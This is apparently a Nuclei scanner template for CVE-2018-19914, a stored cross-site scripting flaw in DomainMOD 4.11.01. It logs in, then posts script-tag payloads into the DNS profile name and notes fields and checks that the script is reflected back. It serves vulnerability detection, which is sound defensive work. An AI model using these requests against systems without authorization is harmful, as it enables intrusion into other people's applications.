61 lines
2.1 KiB
YAML
61 lines
2.1 KiB
YAML
id: CVE-2018-19914
|
|
|
|
info:
|
|
name: DomainMOD 4.11.01 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field.
|
|
remediation: |
|
|
Upgrade to the latest version of DomainMOD or apply the necessary patches to fix the XSS vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/46375/
|
|
- https://github.com/domainmod/domainmod/issues/87
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-19914
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 4.8
|
|
cve-id: CVE-2018-19914
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00153
|
|
epss-percentile: 0.51575
|
|
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
vendor: domainmod
|
|
product: domainmod
|
|
tags: cve2018,domainmod,xss,authenticated,edb,cve
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
new_username={{username}}&new_password={{password}}
|
|
- |
|
|
POST /assets/add/dns.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
|
|
- |
|
|
GET /assets/dns.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
req-condition: true
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_3 == 200'
|
|
- 'contains(header_3, "text/html")'
|
|
- 'contains(body_3, "><script>alert(document.domain)</script></a>")'
|
|
condition: and
|
|
|
|
# digest: 4a0a004730450220504a1727b0bec33c1399117912777f3051ccf3ea548ede573a4f2ecd5907140b022100a5a0b4bd2cae22024bdff6afc2eeca6e34bd7ecf65ff05867ff3c6de64cf38c3:922c64590222798bb761d5b6d8e72950
|